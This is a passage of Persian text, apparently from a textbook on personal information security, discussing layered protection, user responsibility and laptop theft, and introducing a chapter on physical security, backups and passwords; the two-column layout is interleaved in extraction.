‫ﺭﺍﻧﻨﺪﮔﻲ ﺑﺎﻳﺪ ﺑﺎ ﺩﻗﺖ ﺍﻧﺠﺎﻡ ﮔﻴﺮﺩ‪.‬‬ ‫•‬ ‫ﻻ ﺿﻤﻴﻤﻪﻫﺎﻱ ﺍﻳﻦ ﻧﺎﻣـﻪﻫـﺎ‬ ‫ﺩﻗﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛﻪ ﻣﻌﻤﻮ ﹰ‬
‫ﭼﻴﺰﻱ ﺟﺰ ﻭﻳﺮﻭﺳﻬﺎﻱ ﺧﻄﺮﻧﺎﻙ ﻧﻴﺴﺘﻨﺪ؛ ﻭ‬
‫ﭼﻨﺎﻧﭽﻪ ﻛﺎﺭﺧﺎﻧـﻪ ﻧـﺴﺒﺖ ﺑـﻪ ﻭﺟـﻮﺩ ﻋﻴﺒـﻲ ﺩﺭ ﻣﺎﺷـﻴﻦ‬ ‫•‬
‫ﻫﺸﺪﺍﺭ ﺩﻫﺪ ﻛﻪ ﺑﺎ ﺳﻼﻣﺖ ﺍﻓﺮﺍﺩ ﻣﺮﺗﺒﻂ ﺑﺎﺷﺪ‪ ،‬ﺁﻥ ﻋﻴـﺐ‬ ‫ﺩﺭ ﻣﺤﻴﻄﻬﺎﻳﻲ ﻛﻪ ﺗﻌﺪﺍﺩ ﺯﻳﺎﺩﻱ ﺭﺍﻳﺎﻧﻪ ﻳﺎﻓـﺖ ﻣـﻲﺷـﻮﻧﺪ‬ ‫•‬
‫ﺑﺎﻳﺪ ﺳﺮﻳﻌﹰﺎ ﺭﻓﻊ ﮔﺮﺩﺩ‪.‬‬ ‫)ﻣﺮﺍﻛــﺰ ﻛــﺎﺭﻱ‪ ،‬ﻣــﺪﺍﺭﺱ‪ ،‬ﺍﺩﺍﺭﻩﻫــﺎﻱ ﺩﻭﻟﺘــﻲ( ﻻﺯﻡ ﺍﺳــﺖ ﻛــﻪ‬
‫ﺷﺨﺼﻲ ﺑﻌﻨﻮﺍﻥ ﺭﺍﻫﺒﺮ ﺳﻴﺴﺘﻢ‪ ١٠‬ﺟﻬﺖ ﺍﻋﻤﺎﻝ ﺑﺮﺧـﻲ ﺍﺯ‬
‫ﻫﻨﮕﺎﻡ ﺭﺍﻧﻨﺪﮔﻲ ﺑﺎﻳﺪ ﺍﺣﺘﻴﺎﻁ ﻛﺮﺩ‪ ،‬ﭼﺮﺍﻛﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ‬ ‫•‬
‫ﺗﺪﺍﺑﻴﺮ ﺍﻣﻨﻴﺘﻲ ﺑﻜﺎﺭ ﮔﺮﻓﺘﻪ ﺷﻮﺩ‪.‬‬
‫ﻣﺎﺷﻴﻨﻬﺎﻱ ﺩﻳﮕﺮ ﺑﺮﺍﻳﺘﺎﻥ ﻣﺸﻜﻞ ﺑﻴﺎﻓﺮﻳﻨﻨﺪ‪.‬‬
‫ﺍﮔﺮ ﺑﺨﻮﺍﻫﻴﺪ ﻛﺎﺭﻫﺎﻱ ﻣﺮﺑﻮﻁ ﺑﻪ ﺍﻣﻨﻴﺖ ﺳﻴﺴﺘﻤﻬﺎ ﺭﺍ ﺑﻪ ﺩﻳﮕـﺮﺍﻥ‬
‫ﺍﮔﺮ ﺩﺭ ﺭﻭﺯﻧﺎﻣﻪ ﻫﺸﺪﺍﺭ ﺩﺍﺩﻩ ﺷﺪﻩ ﻛﻪ ﭘﻠﻲ ﺷﻜﺴﺘﻪ ﺍﺳﺖ‪،‬‬ ‫•‬
‫ﻧﻴﺰ ﻭﺍﮔﺬﺍﺭ ﻛﻨﻴﺪ ﺑﺎﻳـﺪ ﺍﺯ ﻳـﻚ ﻃـﺮﺡ ﺗﻌﺎﻣـﻞ ﻣﻨﺎﺳـﺐ ﺍﺳـﺘﻔﺎﺩﻩ‬
‫ﺑﺎﻳﺪ ﺍﺯ ﺭﺍﻧﻨﺪﮔﻲ ﺑﺮ ﺭﻭﻱ ﺁﻥ ﭘﺮﻫﻴﺰ ﺷﻮﺩ‪.‬‬
‫ﻧﻤﺎﻳﻴﺪ‪ .‬ﺍﻃﻼﻋﺎﺕ ﺑﻴﺸﺘﺮ ﺩﺭ ﺯﻣﻴﻨﺔ ﺍﺩﺍﺭﺓ ﺳﻴﺴﺘﻤﻬﺎ ﺩﺭ ﺑﺨـﺸﻬﺎﻱ‬
‫ﻫﻴﭽﻜﺪﺍﻡ ﺍﺯ ﻋﻮﺍﻣﻞ ﺑﺎﻻ ﺑﻪ ﺗﻨﻬﺎﻳﻲ ﻗﺎﺩﺭ ﺑـﻪ ﺗـﻀﻤﻴﻦ ﺳـﻼﻣﺖ‬ ‫ﺩﻳﮕﺮ ﻛﺘﺎﺏ ﺍﺭﺍﺋﻪ ﺧﻮﺍﻫﺪ ﺷﺪ‪ .‬ﺩﻗﺖ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻛـﻪ ﻣـﺸﺨﺺ‬
‫ﺷﻤﺎ ﻧﺨﻮﺍﻫﻨﺪ ﺑﻮﺩ‪ ،‬ﻭﻟﻲ ﺑﺎ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻦ ﻫﻤـﺔ ﺁﻧﻬـﺎ ﻣـﻲﺗـﻮﺍﻥ‬ ‫ﻛﺮﺩﻥ ﻣﺴﺌﻮﻟﻴﺘﻬﺎ ﺩﺭ ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺗﺤﺖ ﮔﺮﻭﻫﻬﺎﻱ ﻳﻚ ﻳﺎ‬
‫ﺍﺣﺘﻤﺎﻝ ﺑﺮﻭﺯ ﺗﺼﺎﺩﻑ ﺭﺍ ﺗﺎ ﺣـﺪ ﻗﺎﺑـﻞ ﺗـﻮﺟﻬﻲ ﻛـﺎﻫﺶ ﺩﺍﺩ‪ .‬ﺩﺭ‬ ‫ﭼﻨﺪ ﻧﻔﺮﻩ ﺑﺨﺶ ﻣﻬﻤﻲ ﺍﺯ ﻫﺮ ﻃﺮﺡ ﺍﻣﻨﻴﺘﻲ ﺍﺳﺖ‪.‬‬
‫ﺗﺪﻭﻳﻦ ﺍﺟﺰﺍﻱ ﻳـﻚ ﻃـﺮﺡ ﺍﻣﻨﻴﺘـﻲ‪ ،‬ﺍﻓـﺮﺍﺩ ﺑﺎﻳـﺪ ﻻﻳـﻪﻫـﺎﻳﻲ ﺍﺯ‬
‫ﺣﻔﺎﻇﺖ ﺭﺍ ﺑﻜﺎﺭ ﮔﻴﺮﻧـﺪ ﻛـﻪ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺣﺘـﻲ ﺗـﺎ ﺣـﺪﻭﺩﻱ‬ ‫ﺗﺼﻤﻴﻢﮔﻴﺮﻱ ﺩﺭ ﻣﻮﺭﺩ ﻃﺮﺡ ﺍﻣﻨﻴﺖ ﻓﺮﺩﻱ‬
‫ﺗﻜﺮﺍﺭﻱ ﺑﺎﺷﻨﺪ‪ .‬ﺑﺮﺍﻱ ﺩﺭﻙ ﺑﻬﺘﺮ ﺗﺼﻮﺭ ﻛﻨﻴﺪ ﻛﻪ ﻣـﻲﺧﻮﺍﻫﻴـﺪ ﺍﺯ‬ ‫ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺑﺴﻴﺎﺭﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﻪ ﻧﻴﺎﺯﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳﺎﻧﻪﻫﺎ‬
‫ﻳﻚ ﺗﻜﻪ ﺟﻮﺍﻫﺮ ﻗﻴﻤﺘﻲ ﻣﺤﺎﻓﻈﺖ ﻛﻨﻴـﺪ‪ .‬ﻣـﺴﻠﻤﹰﺎ ﺁﻧـﺮﺍ ﺩﺭ ﻳـﻚ‬ ‫ﻣﻲﭘﺮﺩﺍﺯﻧﺪ‪ .‬ﺍﻛﻨﻮﻥ ﻛﻪ ﺷﻤﺎ ﻣﻔﻬﻮﻡ ﺧﻄﺮﺍﺕ ﺭﺍ ﺩﺭﻙ ﻛـﺮﺩﻩ ﻭ ﺩﺭ‬
‫ﺟﻌﺒﺔ ﺳﺮﺑﺴﺘﻪ ﻭ ﺳﭙﺲ ﺩﺭ ﻳﻚ ﺍﺗﺎﻕ ﻗﻔﻞﺷﺪﻩ ﻗﺮﺍﺭ ﻣﻲﺩﻫﻴـﺪ؛ ﻭ‬ ‫ﺭﺍﺑﻄﻪ ﺑﺎ ﺍﻧﻮﺍﻉ ﺧﻄﺮﺍﺗﻲ ﻛﻪ ﺑﺎﻳﺪ ﻛﺎﻫﺶ ﻳﺎﻓﺘﻪ ﻭ ﻳﺎ ﺍﺯ ﺑﻴﻦ ﺑﺮﻭﻧـﺪ‬
‫ﺟﻬﺖ ﻛﺴﺐ ﺍﻃﻤﻴﻨﺎﻥ ﺑﻴﺸﺘﺮ‪ ،‬ﺁﻧـﺮﺍ ﺩﺭ ﺑﺮﺍﺑـﺮ ﺳـﺮﻗﺖ ﻧﻴـﺰ ﺑﻴﻤـﻪ‬ ‫ﺗﺼﻤﻴﻢﮔﻴﺮﻱ ﻛﺮﺩﻩﺍﻳﺪ‪ ،‬ﻗﺎﺩﺭ ﻫﺴﺘﻴﺪ ﻳﻚ ﻃﺮﺡ ﺍﻣﻨﻴﺖ ﻓـﺮﺩﻱ ﺭﺍ‬
‫ﺧﻮﺍﻫﻴﺪ ﻧﻤﻮﺩ‪ .‬ﺩﺭ ﺍﻳﻦ ﻣﺜﺎﻝ ﻋﻤﻞ ﻣﺤﺎﻓﻈﺖ ﺩﺭ ﭼﻨـﺪﻳﻦ ﻣﺮﺣﻠـﻪ‬ ‫ﺑــﻪ ﺍﺟــﺮﺍ ﺩﺭ ﺁﻭﺭﻳــﺪ‪ .‬ﭘــﺲ ﺍﺯ ﺍﺭﺯﻳــﺎﺑﻲ ﻗﻴﻤﺘﻬــﺎ‪ ،‬ﺯﻣــﺎﻥ ﻻﺯﻡ ﻭ‬
‫ﺍﻧﺠﺎﻡ ﮔﺮﻓﺘﻪ ﺍﺳﺖ‪ .‬ﻫﺮﻛﺪﺍﻡ ﺍﺯ ﺍﻳﻦ ﻣﺮﺍﺣﻞ ﺑـﻪ ﺗﻨﻬـﺎﻳﻲ ﺿـﺮﻳﺐ‬
‫ﺣﻔﺎﻇﺖ ﺍﺯ ﺟﻮﺍﻫﺮ ﺭﺍ ﻛﻤﻲ ﺑﺎﻻ ﻣﻲﺑﺮﻧﺪ‪ ،‬ﻭﻟﻲ ﻣﺴﻠﻤﹰﺎ ﺑﻜـﺎﺭﮔﻴﺮﻱ‬
‫ﻫﺮﭼﻨﺪ ﺑﺎ ﮔﺴﺘﺮﺵ ﺁﮔﺎﻫﻲ ﺍﻣﻨﻴﺘـﻲ ﺟﺎﻣﻌـﻪ‪ ،‬ﺍﻳـﻦ ﻭﺿـﻊ ﺩﭼـﺎﺭ ﺗﻐﻴﻴـﺮ‬ ‫‪۹‬‬
‫ﺗﻤﺎﻡ ﻣﺮﺍﺣﻞ ﻋﺎﻗﻼﻧﻪﺗﺮ ﺍﺳﺖ‪ ،‬ﭼﺮﺍﻛـﻪ ﺍﮔـﺮ ﺩﺭ ﻳـﻚ ﻣﺮﺣﻠـﻪ ﺑـﺎ‬ ‫ﻣﻲﺷﻮﺩ‪.‬‬
‫‪10‬‬ ‫‪System Administrator‬‬
‫‪٥٣‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﺷﻜﺴﺖ ﻣﻮﺍﺟﻪ ﺷﻮﻳﺪ ﻣﺮﺍﺣﻞ ﺩﻳﮕﺮ ﺩﺭ ﺭﺳﻴﺪﻥ ﺷﻤﺎ ﺑﻪ ﻣﻮﻓﻘﻴﺖ‬


‫ﻼ ﺍﮔﺮ ﺷﺨﺼﻲ ﻏﻴﺮﻗﺎﺑﻞ ﺍﻋﺘﻤـﺎﺩ ﺩﺭ ﺧﺎﻧـﻪ ﺑﺎﺷـﺪ‪،‬‬‫ﻛﻤﻚ ﺧﻮﺍﻫﺪ ﻛﺮﺩ )ﻣﺜ ﹰ‬
‫ﻣﺴﻠﻤﹰﺎ ﻗﻔﻞ ﻛﺮﺩﻥ ﺩﺭ‪ ،‬ﺭﺍﻩ ﻣﻨﺎﺳﺒﻲ ﻧﻴﺴﺖ(‪.‬‬
‫ﻧﻜﺘﺔ ﻗﺎﺑﻞ ﺗﻮﺟﻪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺑﻌﻀﻲ ﻣﻮﺍﻗﻊ ﺍﺣﺘﻤﺎﻝ ﺩﺍﺭﺩ ﻓﻨـﻮﻥ‬
‫ﺍﻣﻨﻴﺘﻲ ﻧﻴﺰ ﺑﺎ ﺷﻜﺴﺖ ﻣﻮﺍﺟﻪ ﺷﻮﻧﺪ‪ .‬ﺍﻳﻦ ﺍﻣﺮ ﻣﻤﻜﻦ ﺍﺳﺖ ﻧﺎﺷﻲ‬
‫ﺍﺯ ﻣﺸﻜﻼﺕ ﻃﺮﺍﺣﻲ‪ ،‬ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺿﻌﻴﻒ ﻭ ﻳﺎ ﺧﻄﺎﻫﺎﻱ ﺍﻧـﺴﺎﻧﻲ‬
‫ﺑﺎﺷﺪ‪ .‬ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﻣﻮﺭﺩ ﻣـﺸﻜﻼﺕ ﺍﺑﺰﺍﺭﻫـﺎﻳﻲ ﻣﺜـﻞ‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﻭﻳﺮﻭﺱﻳﺎﺑﻬﺎ‪ ،‬ﺭﻣﺰﮔﺬﺍﺭﻱ‪ ١١‬ﻭ ﺭﻣﺰﻫﺎﻱ ﻋﺒﻮﺭ ﺻﺪﻕ ﻛﻨﺪ‪ .‬ﺑﻨﺎﺑﺮﺍﻳﻦ‬


‫ﭼﻮﻥ ﺍﻣﻜﺎﻥ ﺷﻜﺴﺖ ﺑﺮﺍﻱ ﻫﺮﻛـﺪﺍﻡ ﺍﺯ ﺍﺑﺰﺍﺭﻫـﺎ ﺩﺭ ﻫـﺮ ﺯﻣـﺎﻧﻲ‬
‫ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻧﺒﺎﻳﺪ ﺗﻨﻬﺎ ﺑﺮ ﻳﻚ ﺷﻴﻮﻩ ﺗﻜﻴﻪ ﻧﻤﻮﺩ‪.‬‬

‫ﻧﻘﺶ ﻛﺎﺭﺑﺮ ﺩﺭ ﺍﻣﻨﻴﺖ‬


‫ﺍﻭﻟﻴﻦ ﻛﺎﺭﺑﺮ ﻛﻪ ﺍﺯ ﺭﺍﻳﺎﻧـﻪ ﺍﺳـﺘﻔﺎﺩﻩ ﻣـﻲﻛﻨـﺪ ﻧﻘـﺶ ﻣﻬﻤـﻲ ﺩﺭ‬
‫ﺗــﻀﻤﻴﻦ ﺍﻳﻤﻨــﻲ ﺭﺍﻳﺎﻧــﻪ ﻭ ﻧــﺮﻡﺍﻓﺰﺍﺭﻫــﺎﻱ ﺁﻥ ﺩﺍﺭﺩ‪ .‬ﺩﺭﻣﺠﻤــﻮﻉ‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺩﻳﮕﺮ ﻧﻴـﺰ ﺩﺭ ﺗـﻀﻤﻴﻦ ﺩﻗـﺖ ﺩﺭ ﻋﻤﻠﻴـﺎﺕ ﺣﻔﺎﻇـﺖ ﻭ‬
‫ﺍﻳﻤﻨﻲ ﻧﻘﺶ ﺑﺴﺰﺍﻳﻲ ﺩﺍﺭﻧﺪ‪ .‬ﺩﻗﺖ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ ﻛـﺎﺭﺑﺮﺍﻧﻲ ﻛـﻪ‬
‫ﻧﺴﺒﺖ ﺑﻪ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﺍﻃﻼﻋﺎﺕ ﻛﺎﻓﻲ ﻧﺪﺍﺭﻧﺪ ﺧﻮﺩ ﺍﺯ ﺑﺰﺭﮔﺘﺮﻳﻦ‬
‫ﺧﻄﺮﺍﺕ ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺸﻤﺎﺭ ﻣﻲﺭﻭﻧﺪ‪.‬‬

‫ﺍﻣﻨﻴﺖ ﻳﻚ ﻫﻨﺮ ﺍﺳﺖ‪ ،‬ﻧﻪ ﻳﻚ ﻋﻠﻢ‬


‫ﺩﺭ ﺍﻳﻤﻦﺳﺎﺯﻱ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺷﺒﻜﻪﻫﺎ ﻫﻴﭻ ﺗﻀﻤﻴﻦ ﺻـﺪ ﺩﺭﺻـﺪﻱ‬
‫ﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ‪ ،‬ﭼﺮﺍﻛﻪ ﻫﻤﻴﺸﻪ ﻧﻘﺎﻳﺺ ﺗﺎﺯﻩ ﻭ ﺭﺍﻫﻬﺎﻱ ﺟﺪﻳﺪ ﻧﻔـﻮﺫ‬
‫ﻭ ﻓﺮﺻـﺘﻬﺎﻱ ﻧـﻮ ﺑـﺮﺍﻱ ﺍﻳﺠـﺎﺩ ﻣـﺸﻜﻞ ‪ -‬ﻛـﻪ ﺧـﻮﺩ ﻧﺎﺷــﻲ ﺍﺯ‬
‫ﺧﻄﺎﻫﺎﻱ ﺍﻧﺴﺎﻧﻲ ﺍﺳﺖ ‪ -‬ﻭﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ‪ .‬ﺍﻣﺎ ﺍﮔـﺮ ﻣﻄﺎﻟﻌـﺔ‬
‫ﺩﻗﻴﻘﻲ ﺍﻧﺠﺎﻡ ﺑﮕﻴﺮﺩ ﻭ ﺍﺯ ﺗﺠﺎﺭﺏ ﻣﻮﻓﻖ ﺍﻣﻨﻴﺘﻲ‪ ١٢‬ﺍﺳـﺘﻔﺎﺩﻩ ﺷـﻮﺩ‬
‫ﻣــﻲﺗــﻮﺍﻥ ﺩﺭ ﻋﻤﻠﻜــﺮﺩ ﺳﻴــﺴﺘﻢ ﺍﻣﻨﻴــﺖ ﻻﺯﻡ ﺭﺍ ﺑﻮﺟــﻮﺩ ﺁﻭﺭﺩ‪.‬‬
‫ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﻭﺏ ﻭ ﮔﺮﻭﻫﻬـﺎﻱ ﭘـﺴﺘﻲ ﺳـﺎﺯﻣﺎﻧﻬﺎﻱ ﺣﻔﺎﻇـﺖ ﺍﺯ‬
‫ﺭﺍﻳﺎﻧﻪ ﻧﻴﺰ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻛﻤﻜﻬـﺎﻱ ﺷـﺎﻳﺎﻧﻲ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﺑﺎﺷـﻨﺪ‪،‬‬
‫ﭼﺮﺍﻛــﻪ ﻣــﻲﺗــﻮﺍﻥ ﺩﺭ ﺷــﺮﺍﻳﻂ ﻏﻴــﺮ ﻣﻌﻤــﻮﻝ ﻭ ﺑــﺮﻭﺯ ﻭﺿــﻌﻴﺖ‬
‫ﻏﻴﺮﻋﺎﺩﻱ ﺍﺯ ﺭﺍﻫﻨﻤﺎﻳﻴﻬﺎﻱ ﺁﻧﻬﺎ ﺑﻬﺮﻩ ﮔﺮﻓﺖ‪.‬‬

‫‪11‬‬ ‫‪Encryption‬‬
‫‪12‬‬ ‫‪Security Best Practices‬‬
‫‪٥٥‬‬ ‫ﺑﺨﺶ ﺩﻭﻡ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ‬

‫ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪ‬
‫ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﺸﻜﻠﻲ ﺭﻭ ﺑﻪ ﺭﺷﺪ ﺍﺳﺖ‪ .‬ﺭﺍﻳﺎﻧﻪﻫـﺎ ﻭ ﺧـﺼﻮﺻﹰﺎ‬
‫ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﻛﻴﻔﻲ ﺑﻪ ﺳﺎﺩﮔﻲ ﺩﺯﺩﻳﺪﻩ ﻣﻲﺷـﻮﻧﺪ ﻭ ﺑـﺴﻴﺎﺭ ﺳـﺨﺖ‬
‫ﭘﻴﺪﺍ ﻣﻲﺷﻮﻧﺪ‪ .‬ﭼﻨﺎﻧﭽﻪ ﺳﺎﺭﻕ ﻣﺎﻳﻞ ﺑﻪ ﺍﺳﺘﻔﺎﺩﺓ ﺷﺨﺼﻲ ﺍﺯ ﺭﺍﻳﺎﻧﻪ‬
‫ﻧﺒﺎﺷﺪ ﻣﺮﺍﻛﺰ ﺑﺴﻴﺎﺭ ﺯﻳﺎﺩﻱ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ ﻛﻪ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺩﺯﺩﻱ ﻭ‬
‫ﻓﺼﻞ ﺳﻮﻡ‬
‫ﺩﺳﺖﺩﻭﻡ ﺭﺍ ﺧﺮﻳﺪﺍﺭﻱ ﻣـﻲﻛﻨﻨـﺪ‪ .‬ﺑﺮﺧـﻲ ﺍﺯ ﺳـﺎﺭﻗﺎﻥ‪ ،‬ﺭﺍﻳﺎﻧـﻪ ﻭ‬ ‫ﺍﻣﻨﻴﺖ ﺭﺍﻳﺎﻧﻪ ﻭ ﺩﺍﺩﻩﻫﺎ‬
‫ﻧﻤﺎﻳﺸﮕﺮ ﺁﻧﺮﺍ ﺑﻄﻮﺭ ﻛﺎﻣﻞ ﺑﻪ ﺳﺮﻗﺖ ﻧﻤﻲﺑﺮﻧﺪ ﺑﻠﻜـﻪ ﻗـﺴﻤﺘﻬﺎﻱ‬
‫ﺑﺨﺶ ﺩﻭﻡ‬

‫ﻣﻬﻢ ﺁﻥ ﻣﺎﻧﻨﺪ ﺣﺎﻓﻈﻪ ﻭ ﭘﺮﺩﺍﺯﺷﮕﺮ ﺭﺍ ﻣﻲﺩﺯﺩﻧﺪ‪ .‬ﺑﺎﻳﺪ ﮔﻔـﺖ ﻛـﻪ‬ ‫ﻛﻠﻴﺎﺕ‬


‫ﻫﺮ ﺩﻭ ﻣﻮﺭﺩ ﺑﺎﺯﺍﺭ ﺧﻮﺑﻲ ﺩﺍﺭﻧـﺪ ﻭ ﺣﻤـﻞ ﻭ ﻧﻘﻠـﺸﺎﻥ ﻧﻴـﺰ ﺁﺳـﺎﻥ‬
‫ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﭘﻴﺪﺍ ﻛﺮﺩﻧﺸﺎﻥ ﺍﮔﺮ ﭼﻪ ﻏﻴﺮﻣﻤﻜﻦ ﻧﻴﺴﺖ ﻭﻟـﻲ ﺑـﺴﻴﺎﺭ‬ ‫ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ ﺑﻪ ﺑﺮﺭﺳﻲ ﺭﺍﻫﻬﺎﻳﻲ ﻣﻲﭘﺮﺩﺍﺯﻳﻢ ﻛﻪ ﺍﺯ ﻃﺮﻳﻖ ﺁﻧﻬـﺎ‬
‫ﺩﺷﻮﺍﺭ ﻣﻲﺑﺎﺷﺪ‪.‬‬ ‫ﻣﻲﺗﻮﺍﻥ ﺭﺍﻳﺎﻧـﻪ ﺭﺍ ﺍﺯ ﻟﺤـﺎﻅ ﻓﻴﺰﻳﻜـﻲ ﺍﻳﻤـﻦ ﻛـﺮﺩ ﻭ ﺍﺯ ﺳـﺮﻗﺖ‬
‫ﺩﺍﺩﻩﻫﺎ ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺟﻠﻮﮔﻴﺮﻱ ﻧﻤـﻮﺩ‪ .‬ﻣﺒﺎﺣـﺚ ﻋﻤـﺪﺓ‬
‫ﻗﺎﻧﻮﻥ ﺍﻭﻝ‪:‬‬ ‫ﺍﻳﻦ ﻓﺼﻞ ﻋﺒﺎﺭﺗﻨﺪ ﺍﺯ‪ :‬ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ‪ ،‬ﻧﺴﺨﻪﻫـﺎﻱ ﭘـﺸﺘﻴﺒﺎﻥ‪ ،‬ﻭ‬
‫ﻗﺒﻞ ﺍﺯ ﻭﻗﻮﻉ ﺳﺮﻗﺖ‪ ،‬ﺑﻪ ﺁﻥ ﺭﺍﻳﺎﻧﻪ ﻓﻜﺮ ﻛﻨﻴﺪ‪.‬‬ ‫ﺗﺼﺪﻳﻖ ﻫﻮﻳﺖ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ‪.‬‬

‫ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻦ ﺭﺍﻳﺎﻧﻪ ﺑﺴﻴﺎﺭ ﺁﺯﺍﺭ ﺩﻫﻨﺪﻩ ﺍﺳﺖ ﻭ ﭼﻨﺎﻧﭽـﻪ ﺑﻴﻤـﻪ‬
‫ﻣﻘﺪﻣﻪ‬
‫ﻧﺒﺎﺷﻴﺪ ﻫﺰﻳﻨﺔ ﮔﺰﺍﻓﻲ ﺭﺍ ﺑﺮ ﺷﻤﺎ ﺗﺤﻤﻴﻞ ﺧﻮﺍﻫﺪ ﻛﺮﺩ‪ .‬ﺩﺭ ﺑﻌـﻀﻲ‬
‫ﻣﻮﺍﻗﻊ ﺳﺮﻗﺖ ﺍﻃﻼﻋﺎﺕ ﺑﺎﻋﺚ ﺍﻓﺸﺎﻱ ﺍﻣﻮﺭ ﺷـﻐﻠﻲ ﻭ ﻳـﺎ ﺍﺳـﺮﺍﺭ‬ ‫ﻳﻜﻲ ﺍﺯ ﺑﻬﺘـﺮﻳﻦ ﺷـﻴﻮﻩﻫـﺎﻱ ﺩﺭﻙ ﻣﻔﻬـﻮﻡ ﺍﻣﻨﻴـﺖ ﺍﻃﻼﻋـﺎﺕ‬
‫ﻣﺤﺮﻣﺎﻧﺔ ﺍﺷﺨﺎﺹ ﻣﻲﮔﺮﺩﺩ ﻭ ﺩﺭ ﺷﺮﺍﻳﻂ ﺑـﺪﺗﺮ‪ ،‬ﺳـﺮﻗﺖ ﺭﺍﻳﺎﻧـﻪ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺭﺍﻫﻜﺎﺭ ﺿﺎﺑﻄﻪﻣﻨﺪ‪ ١٣‬ﺍﺳﺖ‪ .‬ﺑﺎ ﺷـﺮﻭﻉ ﺍﺯ ﻣﻌﺮﻓـﻲ‬
‫ﺑﺎﻋﺚ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻥ ﺷﻐﻞ ﻣﻲﺷﻮﺩ‪ .‬ﺑﺎ ﺍﻳﻨﺤﺎﻝ ﭼﻨﺎﻧﭽـﻪ ﺩﺭ ﺍﻳـﻦ‬ ‫ﺍﻣﻨﻴﺖ ﻓﻴﺰﻳﻜﻲ ﺩﺭ ﺍﻳﻦ ﻓﺼﻞ‪ ،‬ﺩﺭ ﺳﺎﻳﺮ ﻓـﺼﻮﻝ ﺑﺨـﺶ ﺩﻭﻡ ﺑـﻪ‬
‫ﺧﺼﻮﺹ ﭼﻨـﺪ ﺭﻭﺵ ﺳـﺎﺩﻩ ﻭ ﺍﺭﺯﺍﻥﻗﻴﻤـﺖ ﺑﻜـﺎﺭ ﮔﺮﻓﺘـﻪ ﺷـﻮﺩ‬ ‫ﺑﺮﺭﺳﻲ ﺟﻮﺍﻧﺐ ﺩﻳﮕﺮ ﺍﻣﻨﻴﺖ ﺧﻮﺍﻫﻴﻢ ﭘﺮﺩﺍﺧﺖ ﻭ ﺍﺳﺎﺱ ﺍﺳـﺘﻘﺮﺍﺭ‬
‫ﻣﻲ ﺗﻮﺍﻥ ﺍﺯ ﺳﺮﻗﺖ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺭﻭﻣﻴﺰﻱ ﻭ ﻛﻴﻔﻲ ﺟﻠﻮﮔﻴﺮﻱ ﻛـﺮﺩ‬ ‫ﻓﺮﺁﻳﻨﺪﻫﺎﻱ ﺍﻣﻨﻴﺘﻲ ﺑـﺮﺍﻱ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻱ ﺷﺨـﺼﻲ ﻭ ﮔـﺮﻭﻩﻫـﺎﻱ‬
‫ﻳﺎ ﺣﺪﺍﻗﻞ ﺍﺣﺘﻤﺎﻝ ﺁﻧﺮﺍ ﺑﻪ ﻣﻴﺰﺍﻥ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﻛﺎﻫﺶ ﺩﺍﺩ‪.‬‬ ‫ﻛﻮﭼﻚ ﺭﺍﻳﺎﻧﻪ ﺍﻱ ﺭﺍ ﺗﻮﺿﻴﺢ ﺧﻮﺍﻫﻴﻢ ﺩﺍﺩ‪ .‬ﺍﻃﻼﻋﺎﺕ ﻣﺮﺑـﻮﻁ ﺑـﻪ‬
